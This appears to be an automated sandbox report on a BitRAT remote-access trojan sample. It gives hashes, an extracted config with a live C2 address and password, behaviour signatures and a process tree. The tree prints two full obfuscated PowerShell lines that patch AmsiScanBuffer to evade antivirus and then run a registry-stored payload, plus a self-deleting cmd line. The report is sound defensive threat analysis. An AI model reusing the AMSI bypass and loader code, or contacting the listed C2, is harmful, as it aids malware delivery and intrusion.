Overview

overview

10

Static

static

3

80dcd56f6d...95.exe

windows7-x64

10

80dcd56f6d...95.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    155s
  • max time network
    159s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    29-01-2024 21:04

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    80dcd56f6d8e3324d715736b66858795.exe

  • Size

    7.9MB

  • MD5

    80dcd56f6d8e3324d715736b66858795

  • SHA1

    5b94991f56910b4bac99bef952ce88c740883b4d

  • SHA256

    2a5860280179b24de91f70165fb736afa5947cefb5c33c63202c7d8c5d00d1d0

  • SHA512

    d9e0d10a5c11ec3e3ccb62e448f9be9c6287ae118cc7c84f2012999b35836688946dd3a05b046daf370870fadcec2f690850f25f5811400572639de0554e135b

  • SSDEEP

    196608:LK8mrs8c1/ohqLBhTZEIN+8y2CVoW1a+QKON:tmrsChqNby2CB1a+

Score
10/10
bitrattrojanupx

Malware Config

Extracted

Family

bitrat

Version

1.38

C2

178.20.40.235:5555

Attributes
  • communication_password

    cc86a50fb8f3c4840cb346a0829f64a2

  • tor_process

    tor

Signatures

  • BitRAT

    BitRAT is a remote access tool written in C++ and uses leaked source code from other families.

    trojanbitrat
  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Drops file in System32 directory 25 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 9 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 1 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\lsass.exe
    C:\Windows\system32\lsass.exe
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:676
  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:584
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:316
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{29ee1cc6-5340-4ac1-810a-27bd7035b933}
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1844
      • C:\Windows\SysWOW64\dllhost.exe
        C:\Windows\SysWOW64\dllhost.exe /Processid:{de891a68-cce4-46ea-8cea-e32fbe04ef3a}
        2⤵
          PID:1868
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
        1⤵
          PID:512
        • C:\Windows\System32\svchost.exe
          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
          1⤵
            PID:1088
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
            1⤵
            • Drops file in System32 directory
            PID:1216
            • C:\Windows\system32\taskhostw.exe
              taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
              2⤵
                PID:2776
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
                C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:SvFBkGvvqaNK{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$WAZySZdQDgdNJN,[Parameter(Position=1)][Type]$hhlxguHdRn)$LevuJyCmaTl=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$LevuJyCmaTl.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$WAZySZdQDgdNJN).SetImplementationFlags('Runtime,Managed');$LevuJyCmaTl.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$hhlxguHdRn,$WAZySZdQDgdNJN).SetImplementationFlags('Runtime,Managed');Write-Output $LevuJyCmaTl.CreateType();}$HEcBJhYsIRWxh=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$XNJcDCYpqnMoGl=$HEcBJhYsIRWxh.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$vRaiGxMGPNqETvYRHvb=SvFBkGvvqaNK @([String])([IntPtr]);$rzJcSjnxUkTaVFdyXIPUts=SvFBkGvvqaNK @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$PWDXlFkKnVf=$HEcBJhYsIRWxh.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$diOhohuAIUZtSU=$XNJcDCYpqnMoGl.Invoke($Null,@([Object]$PWDXlFkKnVf,[Object]('Load'+'LibraryA')));$NARBTZlcHnXnyXhrQ=$XNJcDCYpqnMoGl.Invoke($Null,@([Object]$PWDXlFkKnVf,[Object]('Vir'+'tual'+'Pro'+'tect')));$HTmLMzr=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($diOhohuAIUZtSU,$vRaiGxMGPNqETvYRHvb).Invoke('a'+'m'+'si.dll');$jkaVYFxJXNGpOuXdU=$XNJcDCYpqnMoGl.Invoke($Null,@([Object]$HTmLMzr,[Object]('Ams'+'iSc'+'an'+'Buffer')));$EpFJhcMLjy=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NARBTZlcHnXnyXhrQ,$rzJcSjnxUkTaVFdyXIPUts).Invoke($jkaVYFxJXNGpOuXdU,[uint32]8,4,[ref]$EpFJhcMLjy);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$jkaVYFxJXNGpOuXdU,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NARBTZlcHnXnyXhrQ,$rzJcSjnxUkTaVFdyXIPUts).Invoke($jkaVYFxJXNGpOuXdU,[uint32]8,0x20,[ref]$EpFJhcMLjy);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('$77stager')).EntryPoint.Invoke($Null,$Null)"
                2⤵
                • Suspicious use of NtCreateUserProcessOtherParentProcess
                • Drops file in System32 directory
                • Suspicious use of SetThreadContext
                • Modifies data under HKEY_USERS
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1592
                • C:\Windows\System32\Conhost.exe
                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  3⤵
                    PID:4340
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:DghJHHMgzIMm{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$mYnEObHFVUitkB,[Parameter(Position=1)][Type]$ZZXxGuMCZh)$ptFZaceDNym=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$ptFZaceDNym.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$mYnEObHFVUitkB).SetImplementationFlags('Runtime,Managed');$ptFZaceDNym.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$ZZXxGuMCZh,$mYnEObHFVUitkB).SetImplementationFlags('Runtime,Managed');Write-Output $ptFZaceDNym.CreateType();}$pxoXQYImIWJTe=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$TBCmkQbPVORBQt=$pxoXQYImIWJTe.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$epRVEsNAIKeWNIDcsaO=DghJHHMgzIMm @([String])([IntPtr]);$qgGtancAakPiltSyBQwbXs=DghJHHMgzIMm @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$XypoUROdUvY=$pxoXQYImIWJTe.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$nlABNPBbgPiuJj=$TBCmkQbPVORBQt.Invoke($Null,@([Object]$XypoUROdUvY,[Object]('Load'+'LibraryA')));$dshhBhIONdcTosVzT=$TBCmkQbPVORBQt.Invoke($Null,@([Object]$XypoUROdUvY,[Object]('Vir'+'tual'+'Pro'+'tect')));$swJRaOC=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($nlABNPBbgPiuJj,$epRVEsNAIKeWNIDcsaO).Invoke('a'+'m'+'si.dll');$QBHFTaYOxjvmuSxUb=$TBCmkQbPVORBQt.Invoke($Null,@([Object]$swJRaOC,[Object]('Ams'+'iSc'+'an'+'Buffer')));$uWlwBSaJkR=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($dshhBhIONdcTosVzT,$qgGtancAakPiltSyBQwbXs).Invoke($QBHFTaYOxjvmuSxUb,[uint32]8,4,[ref]$uWlwBSaJkR);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$QBHFTaYOxjvmuSxUb,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($dshhBhIONdcTosVzT,$qgGtancAakPiltSyBQwbXs).Invoke($QBHFTaYOxjvmuSxUb,[uint32]8,0x20,[ref]$uWlwBSaJkR);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('$77stager')).EntryPoint.Invoke($Null,$Null)"
                  2⤵
                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                  • Drops file in System32 directory
                  • Suspicious use of SetThreadContext
                  • Modifies data under HKEY_USERS
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:4284
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                1⤵
                  PID:1268
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                  1⤵
                    PID:1288
                  • C:\Windows\System32\svchost.exe
                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                    1⤵
                    • Drops file in System32 directory
                    PID:1180
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                    1⤵
                      PID:1424
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                      1⤵
                        PID:1432
                        • C:\Windows\system32\sihost.exe
                          sihost.exe
                          2⤵
                            PID:2488
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                          1⤵
                            PID:1316
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                            1⤵
                              PID:1108
                            • C:\Windows\System32\svchost.exe
                              C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                              1⤵
                                PID:1516
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                1⤵
                                  PID:1636
                                • C:\Windows\System32\svchost.exe
                                  C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                  1⤵
                                    PID:1696
                                  • C:\Windows\System32\svchost.exe
                                    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                    1⤵
                                      PID:1704
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                      1⤵
                                        PID:1500
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                        1⤵
                                          PID:1804
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                          1⤵
                                            PID:1820
                                          • C:\Windows\system32\svchost.exe
                                            C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                            1⤵
                                              PID:1912
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                              1⤵
                                                PID:1928
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                1⤵
                                                  PID:2024
                                                • C:\Windows\System32\spoolsv.exe
                                                  C:\Windows\System32\spoolsv.exe
                                                  1⤵
                                                    PID:2068
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                    1⤵
                                                      PID:2032
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                      1⤵
                                                        PID:2188
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                        1⤵
                                                          PID:2260
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                                                          1⤵
                                                            PID:844
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                            1⤵
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:2276
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc
                                                            1⤵
                                                            • Checks SCSI registry key(s)
                                                            PID:716
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                            1⤵
                                                              PID:2512
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                                                              1⤵
                                                                PID:956
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                1⤵
                                                                  PID:2528
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                  1⤵
                                                                    PID:2540
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                    1⤵
                                                                    • Drops file in System32 directory
                                                                    PID:2752
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                    1⤵
                                                                      PID:2808
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                      1⤵
                                                                        PID:2812
                                                                      • C:\Windows\sysmon.exe
                                                                        C:\Windows\sysmon.exe
                                                                        1⤵
                                                                          PID:2844
                                                                        • C:\Windows\System32\svchost.exe
                                                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                          1⤵
                                                                            PID:2888
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                            1⤵
                                                                              PID:2896
                                                                            • C:\Windows\system32\wbem\unsecapp.exe
                                                                              C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                              1⤵
                                                                                PID:3132
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                1⤵
                                                                                  PID:3384
                                                                                • C:\Windows\Explorer.EXE
                                                                                  C:\Windows\Explorer.EXE
                                                                                  1⤵
                                                                                    PID:3588
                                                                                    • C:\Users\Admin\AppData\Local\Temp\80dcd56f6d8e3324d715736b66858795.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\80dcd56f6d8e3324d715736b66858795.exe"
                                                                                      2⤵
                                                                                      • Checks computer location settings
                                                                                      • Modifies registry class
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:5052
                                                                                      • C:\Users\Admin\AppData\Local\Temp\$77.sedsvc.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\$77.sedsvc.exe"
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                        PID:848
                                                                                      • C:\Users\Admin\AppData\Local\Temp\$77.WWI Provider Host.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\$77.WWI Provider Host.exe"
                                                                                        3⤵
                                                                                        • Checks computer location settings
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:912
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com -Count 2 -BufferSize 128 -Delay 1
                                                                                          4⤵
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:4072
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com -Count 2 -BufferSize 128 -Delay 1
                                                                                          4⤵
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:5108
                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            5⤵
                                                                                              PID:180
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com -Count 2 -BufferSize 128 -Delay 1
                                                                                            4⤵
                                                                                              PID:1976
                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                5⤵
                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                PID:3424
                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com -Count 2 -BufferSize 128 -Delay 1
                                                                                              4⤵
                                                                                                PID:1340
                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  5⤵
                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                  PID:4084
                                                                                            • C:\Users\Admin\AppData\Local\Temp\$77.Install.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\$77.Install.exe"
                                                                                              3⤵
                                                                                              • Executes dropped EXE
                                                                                              • Drops file in Windows directory
                                                                                              PID:1056
                                                                                            • C:\Windows\System32\cmd.exe
                                                                                              "C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 1 -w 100 > Nul & Del "C:\Users\Admin\AppData\Local\Temp\80dcd56f6d8e3324d715736b66858795.exe"& ping 1.1.1.1 -n 1 -w 900 > Nul & Del "C:\Users\Admin\AppData\Local\Temp\80dcd56f6d8e3324d715736b66858795.exe"
                                                                                              3⤵
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:5004
                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                ping 1.1.1.1 -n 1 -w 100
                                                                                                4⤵
                                                                                                • Runs ping.exe
                                                                                                PID:5024
                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                ping 1.1.1.1 -n 1 -w 900
                                                                                                4⤵
                                                                                                • Runs ping.exe
                                                                                                PID:4776
                                                                                        • C:\Windows\system32\DllHost.exe
                                                                                          C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                          1⤵
                                                                                            PID:3940
                                                                                          • C:\Windows\System32\RuntimeBroker.exe
                                                                                            C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                            1⤵
                                                                                              PID:1460
                                                                                            • C:\Windows\system32\svchost.exe
                                                                                              C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                              1⤵
                                                                                                PID:3760
                                                                                              • C:\Windows\System32\RuntimeBroker.exe
                                                                                                C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                1⤵
                                                                                                  PID:4228
                                                                                                • C:\Windows\System32\RuntimeBroker.exe
                                                                                                  C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                  1⤵
                                                                                                    PID:4652
                                                                                                  • C:\Windows\system32\SppExtComObj.exe
                                                                                                    C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                    1⤵
                                                                                                      PID:4772
                                                                                                    • C:\Windows\System32\svchost.exe
                                                                                                      C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                      1⤵
                                                                                                        PID:2016
                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                        1⤵
                                                                                                        • Modifies data under HKEY_USERS
                                                                                                        PID:4576
                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                        C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                        1⤵
                                                                                                        • Modifies data under HKEY_USERS
                                                                                                        PID:3468
                                                                                                      • C:\Windows\System32\svchost.exe
                                                                                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                        1⤵
                                                                                                          PID:540
                                                                                                        • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                          "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                          1⤵
                                                                                                          • Drops file in System32 directory
                                                                                                          • Modifies data under HKEY_USERS
                                                                                                          PID:2956
                                                                                                        • C:\Windows\system32\DllHost.exe
                                                                                                          C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                          1⤵
                                                                                                            PID:516
                                                                                                            • C:\Windows\system32\WerFault.exe
                                                                                                              C:\Windows\system32\WerFault.exe -u -p 516 -s 372
                                                                                                              2⤵
                                                                                                                PID:620
                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                                                                                              1⤵
                                                                                                                PID:5008
                                                                                                              • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                1⤵
                                                                                                                  PID:3972
                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                  C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
                                                                                                                  1⤵
                                                                                                                    PID:3200
                                                                                                                  • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                    C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                    1⤵
                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                    PID:4108
                                                                                                                  • C:\Windows\System32\WaaSMedicAgent.exe
                                                                                                                    C:\Windows\System32\WaaSMedicAgent.exe 994431210eadda20772261f119916d7b RVQ/bmb0LEinsBU/vyMb3g.0.1.0.0.0
                                                                                                                    1⤵
                                                                                                                      PID:1420
                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                        2⤵
                                                                                                                          PID:1760
                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                                        1⤵
                                                                                                                          PID:772
                                                                                                                        • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                          C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                          1⤵
                                                                                                                            PID:2204
                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                                            1⤵
                                                                                                                              PID:4668
                                                                                                                            • C:\Windows\System32\svchost.exe
                                                                                                                              C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                              1⤵
                                                                                                                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                              PID:4948
                                                                                                                              • C:\Windows\system32\WerFault.exe
                                                                                                                                C:\Windows\system32\WerFault.exe -pss -s 496 -p 4080 -ip 4080
                                                                                                                                2⤵
                                                                                                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                PID:2572
                                                                                                                            • C:\Windows\System32\mousocoreworker.exe
                                                                                                                              C:\Windows\System32\mousocoreworker.exe -Embedding
                                                                                                                              1⤵
                                                                                                                              • Checks processor information in registry
                                                                                                                              • Enumerates system info in registry
                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                              PID:2992
                                                                                                                            • C:\Windows\system32\DllHost.exe
                                                                                                                              C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                              1⤵
                                                                                                                              • Drops file in System32 directory
                                                                                                                              PID:4080
                                                                                                                              • C:\Windows\system32\WerFault.exe
                                                                                                                                C:\Windows\system32\WerFault.exe -u -p 4080 -s 712
                                                                                                                                2⤵
                                                                                                                                • Checks processor information in registry
                                                                                                                                • Enumerates system info in registry
                                                                                                                                PID:2064

                                                                                                                            Network

                                                                                                                            MITRE ATT&CK Enterprise v15

                                                                                                                            Replay Monitor

                                                                                                                            Loading Replay Monitor...

                                                                                                                            Downloads

                                                                                                                            • C:\ProgramData\Microsoft\Windows\WER\Temp\WERD2AC.tmp.csv
                                                                                                                              Filesize

                                                                                                                              36KB

                                                                                                                              MD5

                                                                                                                              b0dda67d2d471f21db912f0dab2ac01e

                                                                                                                              SHA1

                                                                                                                              bd9e3de3accc0e55da1bc96c17c8b720e41f8ed3

                                                                                                                              SHA256

                                                                                                                              dd643e576c1b226aa6c0b6688a8c1e5ff545e3713b99475ee7dd823b420d0030

                                                                                                                              SHA512

                                                                                                                              65ce262cca48b759bfc8e83052f9d26fb8ed7dc3ac48996cde140eaf95cccc65e7003acc5d7e1b523c0ed893e40719dd67c4e01e3b41326a13146b9b943cd142

                                                                                                                              Download Submit

                                                                                                                            • C:\ProgramData\Microsoft\Windows\WER\Temp\WERD32A.tmp.txt
                                                                                                                              Filesize

                                                                                                                              13KB

                                                                                                                              MD5

                                                                                                                              30aecb6398181bd55367e682b18a9575

                                                                                                                              SHA1

                                                                                                                              64a033f55c1ad0c003a447d439f420658412e03b

                                                                                                                              SHA256

                                                                                                                              02bab7447f780a26a4c03ac4204311e40aeb9b29f5f63e6350297ba16f50e45b

                                                                                                                              SHA512

                                                                                                                              fbd7b2e31bfdeeda0602157da2567f145025dab4599205856e9b36a0f59199a4b971538924251a0a565d38227a32696e177da31f69e3092d1d2f40eca923d7e3

                                                                                                                              Download Submit

                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                                                                                              Filesize

                                                                                                                              3KB

                                                                                                                              MD5

                                                                                                                              223bd4ae02766ddc32e6145fd1a29301

                                                                                                                              SHA1

                                                                                                                              900cfd6526d7e33fb4039a1cc2790ea049bc2c5b

                                                                                                                              SHA256

                                                                                                                              1022ec2fed08ff473817fc53893e192a8e33e6a16f3d2c8cb6fd37f49c938e1e

                                                                                                                              SHA512

